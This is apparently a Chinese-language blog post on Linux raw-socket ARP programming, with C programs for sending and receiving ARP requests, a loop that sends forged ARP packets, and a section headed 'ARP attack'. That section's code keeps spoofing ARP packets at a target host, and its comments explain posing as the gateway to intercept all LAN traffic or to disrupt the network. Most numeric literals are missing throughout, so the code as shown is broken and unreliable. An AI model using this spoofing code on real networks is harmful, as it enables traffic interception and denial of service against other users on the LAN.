原始套接字--arp相关
arp请求示例
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <net/ethernet.h>
#include <net/if_arp.h>
#include <net/if.h>
#include <netpacket/packet.h> /* 以太网帧首部长度 */
#define ETHER_HEADER_LEN sizeof(struct ether_header)
/* 整个arp结构长度 */
#define ETHER_ARP_LEN sizeof(struct ether_arp)
/* 以太网 + 整个arp结构长度 */
#define ETHER_ARP_PACKET_LEN ETHER_HEADER_LEN + ETHER_ARP_LEN
/* IP地址长度 */
#define IP_ADDR_LEN 4
/* 广播地址 */
#define BROADCAST_ADDR {0xff, 0xff, 0xff, 0xff, 0xff, 0xff} void err_exit(const char *err_msg)
{
perror(err_msg);
exit();
} /* 填充arp包 */
struct ether_arp *fill_arp_packet(const unsigned char *src_mac_addr, const char *src_ip, const char *dst_ip)
{
struct ether_arp *arp_packet;
struct in_addr src_in_addr, dst_in_addr;
unsigned char dst_mac_addr[ETH_ALEN] = BROADCAST_ADDR; /* IP地址转换 */
inet_pton(AF_INET, src_ip, &src_in_addr);
inet_pton(AF_INET, dst_ip, &dst_in_addr); /* 整个arp包 */
arp_packet = (struct ether_arp *)malloc(ETHER_ARP_LEN);
arp_packet->arp_hrd = htons(ARPHRD_ETHER);
arp_packet->arp_pro = htons(ETHERTYPE_IP);
arp_packet->arp_hln = ETH_ALEN;
arp_packet->arp_pln = IP_ADDR_LEN;
arp_packet->arp_op = htons(ARPOP_REQUEST);
memcpy(arp_packet->arp_sha, src_mac_addr, ETH_ALEN);
memcpy(arp_packet->arp_tha, dst_mac_addr, ETH_ALEN);
memcpy(arp_packet->arp_spa, &src_in_addr, IP_ADDR_LEN);
memcpy(arp_packet->arp_tpa, &dst_in_addr, IP_ADDR_LEN); return arp_packet;
} /* arp请求 */
void arp_request(const char *if_name, const char *dst_ip)
{
struct sockaddr_ll saddr_ll;
struct ether_header *eth_header;
struct ether_arp *arp_packet;
struct ifreq ifr;
char buf[ETHER_ARP_PACKET_LEN];
unsigned char src_mac_addr[ETH_ALEN];
unsigned char dst_mac_addr[ETH_ALEN] = BROADCAST_ADDR;
char *src_ip;
int sock_raw_fd, ret_len, i; if ((sock_raw_fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ARP))) == -)
err_exit("socket()"); bzero(&saddr_ll, sizeof(struct sockaddr_ll));
bzero(&ifr, sizeof(struct ifreq));
/* 网卡接口名 */
memcpy(ifr.ifr_name, if_name, strlen(if_name)); /* 获取网卡接口索引 */
if (ioctl(sock_raw_fd, SIOCGIFINDEX, &ifr) == -)
err_exit("ioctl() get ifindex");
saddr_ll.sll_ifindex = ifr.ifr_ifindex;
saddr_ll.sll_family = PF_PACKET; /* 获取网卡接口IP */
if (ioctl(sock_raw_fd, SIOCGIFADDR, &ifr) == -)
err_exit("ioctl() get ip");
src_ip = inet_ntoa(((struct sockaddr_in *)&(ifr.ifr_addr))->sin_addr);
printf("local ip:%s\n", src_ip); /* 获取网卡接口MAC地址 */
if (ioctl(sock_raw_fd, SIOCGIFHWADDR, &ifr))
err_exit("ioctl() get mac");
memcpy(src_mac_addr, ifr.ifr_hwaddr.sa_data, ETH_ALEN);
printf("local mac");
for (i = ; i < ETH_ALEN; i++)
printf(":%02x", src_mac_addr[i]);
printf("\n"); bzero(buf, ETHER_ARP_PACKET_LEN);
/* 填充以太首部 */
eth_header = (struct ether_header *)buf;
memcpy(eth_header->ether_shost, src_mac_addr, ETH_ALEN);
memcpy(eth_header->ether_dhost, dst_mac_addr, ETH_ALEN);
eth_header->ether_type = htons(ETHERTYPE_ARP);
/* arp包 */
arp_packet = fill_arp_packet(src_mac_addr, src_ip, dst_ip);
memcpy(buf + ETHER_HEADER_LEN, arp_packet, ETHER_ARP_LEN); /* 发送请求 */
ret_len = sendto(sock_raw_fd, buf, ETHER_ARP_PACKET_LEN, , (struct sockaddr *)&saddr_ll, sizeof(struct sockaddr_ll));
if ( ret_len > )
printf("sendto() ok!!!\n"); close(sock_raw_fd);
} int main(int argc, const char *argv[])
{
if (argc != )
{
printf("usage:%s device_name dst_ip\n", argv[]);
exit();
} arp_request(argv[], argv[]); return ;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <net/ethernet.h> /* 以太网帧首部长度 */
#define ETHER_HEADER_LEN sizeof(struct ether_header)
/* 整个arp结构长度 */
#define ETHER_ARP_LEN sizeof(struct ether_arp)
/* 以太网 + 整个arp结构长度 */
#define ETHER_ARP_PACKET_LEN ETHER_HEADER_LEN + ETHER_ARP_LEN
/* IP地址长度 */
#define IP_ADDR_LEN 4 void err_exit(const char *err_msg)
{
perror(err_msg);
exit();
} int main(void)
{
struct ether_arp *arp_packet;
char buf[ETHER_ARP_PACKET_LEN];
int sock_raw_fd, ret_len, i; if ((sock_raw_fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ARP))) == -)
err_exit("socket()"); while ()
{
bzero(buf, ETHER_ARP_PACKET_LEN);
ret_len = recv(sock_raw_fd, buf, ETHER_ARP_PACKET_LEN, );
if (ret_len > )
{
/* 剥去以太头部 */
arp_packet = (struct ether_arp *)(buf + ETHER_HEADER_LEN);
/* arp操作码为2代表arp应答 */
if (ntohs(arp_packet->arp_op) == )
{
printf("==========================arp replay======================\n");
printf("from ip:");
for (i = ; i < IP_ADDR_LEN; i++)
printf(".%u", arp_packet->arp_spa[i]);
printf("\nfrom mac");
for (i = ; i < ETH_ALEN; i++)
printf(":%02x", arp_packet->arp_sha[i]);
printf("\n");
}
}
} close(sock_raw_fd);
return ;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h> #include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <net/if_arp.h>
#include <netpacket/packet.h>
#include <net/if.h>
#include <net/ethernet.h>
#include <arpa/inet.h> #define print_errno(fmt, ...) \
printf("[%d] errno=%d (%s) #" fmt, \
__LINE__, errno, strerror(errno), ####__VA_ARGS__) static unsigned char s_ip_frame_data[ETH_DATA_LEN];
static unsigned int s_ip_frame_size = ; int main(int argc,char** argv)
{
struct ether_header *eth = NULL;
struct ether_arp *arp = NULL;
struct ifreq ifr;
struct in_addr daddr;
struct in_addr saddr;
struct sockaddr_ll sll; int skfd;
int n = ; //unsigned char dmac[ETH_ALEN] = {0x40,0x8d,0x5c,0x79,0xa2,0xad};
//unsigned char dmac[ETH_ALEN] = {0xbc,0xee,0x7b,0x5d,0xa9,0x22};
unsigned char dmac[ETH_ALEN] = {0xff,0xff,0xff,0xff,0xff,0xff};
/*伪造 源MAC*/
unsigned char smac[ETH_ALEN] = {0x38,0x97,0xd6,0x51,0xa0,0x01}; daddr.s_addr = inet_addr("219.216.87.201");
/*伪造 源IP*/
saddr.s_addr = inet_addr("219.216.87.254"); memset(s_ip_frame_data, 0x00, sizeof(unsigned char)*ETH_DATA_LEN); /*创建原始套接字*/
skfd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
if (skfd < ) {
print_errno("socket() failed! \n");
return -;
} bzero(&ifr,sizeof(ifr));
strcpy(ifr.ifr_name, "eth0");
if (- == ioctl(skfd, SIOCGIFINDEX, &ifr)) {
print_errno("ioctl() SIOCGIFINDEX failed!\n");
return -;
}
printf("ifr_ifindex = %d\n", ifr.ifr_ifindex); bzero(&sll, sizeof(sll));
sll.sll_ifindex = ifr.ifr_ifindex;
sll.sll_family = PF_PACKET;
sll.sll_protocol = htons(ETH_P_ALL); #if 0
/*获取本机IP*/
if(- == ioctl(skfd, SIOCGIFADDR, &ifr)){
printf("ioctl() SIOCGIFADDR failed! \n");
return -;
}
printf("ifr_addr = %s\n", \
inet_ntoa(((struct sockaddr_in*)&(ifr.ifr_addr))->sin_addr)); /*获取本机MAC*/
if(- == ioctl(skfd, SIOCGIFHWADDR, &ifr)) {
printf("ioctl() SIOCGIFHWADDR failed! \n");
return -;
}
printf("ifr_hwaddr = %02x-%02x-%02x-%02x-%02x-%02x\n", \
(unsigned char)ifr.ifr_hwaddr.sa_data[], \
(unsigned char)ifr.ifr_hwaddr.sa_data[], \
(unsigned char)ifr.ifr_hwaddr.sa_data[], \
(unsigned char)ifr.ifr_hwaddr.sa_data[], \
(unsigned char)ifr.ifr_hwaddr.sa_data[], \
(unsigned char)ifr.ifr_hwaddr.sa_data[]); #endif /*构造以太报文*/
eth = (struct ether_header*)s_ip_frame_data;
eth->ether_type = htons(ETHERTYPE_ARP);
memcpy(eth->ether_dhost, dmac, ETH_ALEN);
memcpy(eth->ether_shost, smac, ETH_ALEN); /*构造ARP报文*/
arp = (struct ether_arp*)(s_ip_frame_data + sizeof(struct ether_header));
arp->arp_hrd = htons(ARPHRD_ETHER);
arp->arp_pro = htons(ETHERTYPE_IP);
arp->arp_hln = ETH_ALEN;
arp->arp_pln = ;
arp->arp_op = htons(ARPOP_REQUEST); memcpy(arp->arp_sha, smac, ETH_ALEN);
memcpy(arp->arp_spa, &saddr.s_addr, );
/*
memcpy(arp->arp_tha, dmac, ETH_ALEN);*/
memcpy(arp->arp_tpa, &daddr.s_addr, ); s_ip_frame_size = sizeof(struct ether_header) + sizeof(struct ether_arp);
while(){
n = sendto(skfd, s_ip_frame_data, s_ip_frame_size, , \
(struct sockaddr*)&sll, sizeof(sll));
if (n < ) {
print_errno("sendto() failed!\n");
}
else {
printf("sendto() n = %d \n", n);
}
usleep();
} close(skfd);
return ;
}
arp攻击
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <sys/time.h> #include <asm/types.h> #include <math.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h> #include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h> #define PROTO_ARP 0x0806
#define ETH2_HEADER_LEN 14
#define HW_TYPE 1
#define PROTOCOL_TYPE 0x800
#define MAC_LENGTH 6
#define IPV4_LENGTH 4
#define ARP_REQUEST 0x01
#define ARP_REPLY 0x02
#define BUF_SIZE 60 struct arp_header {
unsigned short hardware_type;
unsigned short protocol_type;
unsigned char hardware_len;
unsigned char protocol_len;
unsigned short opcode;
unsigned char sender_mac[MAC_LENGTH];
unsigned char sender_ip[IPV4_LENGTH];
unsigned char target_mac[MAC_LENGTH];
unsigned char target_ip[IPV4_LENGTH];
}; void main() {
int sd;
unsigned char buffer[BUF_SIZE]; /**
* 在伪装成路由器情况下,
* 1.自身需要实现路由器所有功能,将数据包转发给真正的路由器。否则目标会立即发现外网不可达;
* 2. 由于有合法路由器在线,当被攻击目标主动发起arp查询时,合法路由器的响应会更新目标arp表,所以必须不断发送伪装的arp数据包到攻击目标 1秒1次;
* 3. 合法路由器有mac地址表,应该不会主动询问某个地址,因此这种攻击方式很容易被arp防火墙识别(除非拦截攻击目标的arp查询,在合法路由器响应之前抢先一步将伪装的响应包发送给攻击目标.合法路由器的响应与伪装地址不一致,arp防火墙能够检测- -#)
*/
unsigned char source_ip[] = { , , , }; //可设置任意LAN ip,设置未网关并把mac配置为自己网卡mac则可以伪装成路由器,配合路由服务,拦截lan 所有数据包
unsigned char source_mac[] = { 0x1e, 0xed, 0x19, 0x27, 0x1a, 0xb3 }; //可任意设置,单纯为了破坏内网通讯情况下设置为任意值,如果是伪装成路由器则设置成自己的mac
unsigned char target_ip[] = { , , , }; //被攻击目标,循环发送给所有目标,并定时发送(压制); struct ethhdr *send_req = (struct ethhdr *) buffer;
struct ethhdr *rcv_resp = (struct ethhdr *) buffer;
struct arp_header *arp_req =
(struct arp_header *) (buffer + ETH2_HEADER_LEN);
struct arp_header *arp_resp = (struct arp_header *) (buffer
+ ETH2_HEADER_LEN);
struct sockaddr_ll socket_address;
int index, ret, length = ; memset(buffer, 0x00, ); for (index = ; index < ; index++) { send_req->h_dest[index] = (unsigned char) 0xff;
arp_req->target_mac[index] = (unsigned char) 0x00;
/* Filling the source mac address in the header*/
send_req->h_source[index] = (unsigned char) source_mac[index];
arp_req->sender_mac[index] = (unsigned char) source_mac[index];
socket_address.sll_addr[index] = (unsigned char) source_mac[index];
}
printf("Successfully got eth0 MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n",
send_req->h_source[], send_req->h_source[], send_req->h_source[],
send_req->h_source[], send_req->h_source[],
send_req->h_source[]);
printf(" arp_req MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n",
arp_req->sender_mac[], arp_req->sender_mac[],
arp_req->sender_mac[], arp_req->sender_mac[],
arp_req->sender_mac[], arp_req->sender_mac[]);
printf("socket_address MAC address: %02X:%02X:%02X:%02X:%02X:%02X\n",
socket_address.sll_addr[], socket_address.sll_addr[],
socket_address.sll_addr[], socket_address.sll_addr[],
socket_address.sll_addr[], socket_address.sll_addr[]); /*prepare sockaddr_ll*/
socket_address.sll_family = AF_PACKET;
socket_address.sll_protocol = htons(ETH_P_ARP);
socket_address.sll_ifindex = ; //手动指定设备, ip a 指令查看网卡序号
socket_address.sll_hatype = htons(ARPHRD_ETHER);
socket_address.sll_pkttype = (PACKET_BROADCAST);
socket_address.sll_halen = MAC_LENGTH;
socket_address.sll_addr[] = 0x00;
socket_address.sll_addr[] = 0x00; /* Setting protocol of the packet */
send_req->h_proto = htons(ETH_P_ARP); /* Creating ARP request */
arp_req->hardware_type = htons(HW_TYPE);
arp_req->protocol_type = htons(ETH_P_IP);
arp_req->hardware_len = MAC_LENGTH;
arp_req->protocol_len = IPV4_LENGTH;
arp_req->opcode = htons(ARP_REQUEST);
for (index = ; index < ; index++) {
arp_req->sender_ip[index] = (unsigned char) source_ip[index];
arp_req->target_ip[index] = (unsigned char) target_ip[index];
}
// Submit request for a raw socket descriptor.
if ((sd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < ) {
perror("socket() failed ");
exit(EXIT_FAILURE);
} buffer[] = 0x00;
while(){
ret = sendto(sd, buffer, , , (struct sockaddr*) &socket_address,
sizeof(socket_address));
if (ret == -) {
perror("sendto():");
exit();
} else {
printf(" Sent the ARP REQ \n");
//for (index = 0; index < 42; index++) {
// printf("%02X ", buffer[index]);
// if (index % 16 == 0 && index != 0) {
// printf("\n\t");
// }
//}
}
usleep();
}
close(sd);
}
原始套接字--arp相关的更多相关文章
- 原始套接字--icmp相关
icmp请求 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <uni ...
- linux原始套接字(1)-arp请求与接收
一.概述 以太网的arp数据包结构: arp结构op操作参数:1为请求,2为应答. 常用的数据结构如 ...
- UNIX网络编程——原始套接字的魔力【续】
如何从链路层直接发送数据帧 上一篇里面提到的是从链路层"收发"数据,该篇是从链路层发送数据帧. 上一节我们主要研究了如何从链路层直接接收数据帧,可以通过bind函数来将原始套接字绑 ...
- UNIX网络编程——原始套接字的魔力【下】
可以接收链路层MAC帧的原始套接字 前面我们介绍过了通过原始套接字socket(AF_INET, SOCK_RAW, protocol)我们可以直接实现自行构造整个IP报文,然后对其收发.提醒一点,在 ...
- Linux原始套接字实现分析---转
http://blog.chinaunix.net/uid-27074062-id-3388166.html 本文从IPV4协议栈原始套接字的分类入手,详细介绍了链路层和网络层原始套接字的特点及其内核 ...
- 002.ICMP--拼接ICMP包,实现简单Ping程序(原始套接字)
一.大致流程: 将ICMP头和时间数据设置好后,通过创建好的原始套接字socket发出去.目的主机计算效验和后会将数据原样返回,用当前时间和返回的数据结算时间差,计算出rtt. 二.数据结构: ICM ...
- linux原始套接字(2)-icmp请求与接收
一.概述 上一篇arp请求使用的是链路层的原始套接字.icmp封装在ip数据报里面,所以icmp请 ...
- Win2 Socket(套接字)相关 API
Socket(套接字) 作者信息 肖进 单位:南京中萃食品有限公司 资讯部 邮箱:xiaoj@njb.swirebev.com 电话:025-58642091 与socket有关的一些函数介绍 1.读 ...
- 关于linux 原始套接字编程
关于linux 网络编程最权威的书是<<unix网络编程>>,但是看这本书时有些内容你可能理解的不是很深刻,或者说只知其然而不知其所以然,那么如果你想搞懂的话那么我建议你可以看 ...
随机推荐
- string find简析
原文链接 #include <string>#include <iostream>using namespace std; void main(){ ////find函数返回类 ...
- 【Java-Regex】该用正则表达式却偷懒使用 indexOf 引起的BUG
留着等下写. 背景 Excel列内容,无法获取全部格式,但我们有最终的准确格式. 用准确格式去严格匹配,而不是盲人摸象. 不符合就置为空,符合就.
- 第21章 DMA—直接存储区访问—零死角玩转STM32-F429系列
第21章 DMA—直接存储区访问 全套200集视频教程和1000页PDF教程请到秉火论坛下载:www.firebbs.cn 野火视频教程优酷观看网址:http://i.youku.com/fi ...
- Python 2.x 和 3.x的区别
Python有两个版本,2.x 和 3.x ,两个版本不兼容,3.x 不不考虑对2.x代码的向后兼容. 在3.x中,一些语法,内建函数和对象的行为都有所调整. 大部分的python库都支持 pytho ...
- cmd文件内容添加到文件内容命令
今天需要因为有点SQL文件需要添加修改,但是感觉是做运维工作得当然不能一个一个来了.搞了半天bat才找到这个命令(真是一个不合格的运维) 例如:a.txt 内容添加到 b.txt (不是覆盖,而是在 ...
- java TCP通信 socket 套接字 用图片上传轰炸服务器
客户端 package com.swift.jinji; import java.io.FileInputStream; import java.io.IOException; import java ...
- javascript中call,apply,bind的使用
不同点: 1.call():传参方式跟bind一样(都是以逗号隔开的传参方式),但是跟apply(以数组的形式传参)不一样, 2.bind(): 此方法应用后的情形跟call和apply不一样.该方法 ...
- C#进阶学习笔记(个人整理)
学习笔记 第一章: 一.回顾数组 1.变量 : 只能存储一个数据 2.数组 :存储固定大小的相同类型的数据 3.对象 : 存储多个相同/不同类型的数据 4.集合 : 特殊的容器,存储N个相同/不同类型 ...
- 微信 php 获取token 第二次失败解决办法
第一次成功了,第二次总是失败,很简单,session问题 clearstatcache(); $_SESSION = ''; $_COOKIE = ''; //获得参数 signature nonce ...
- 用Java读取xml文件内容
在AXP中,DOM解析器是1 Document Builder类的一个实例,该实例由 DocumenBailderfactorv类负责创,步如下 DocumentBuilderFactory fa ...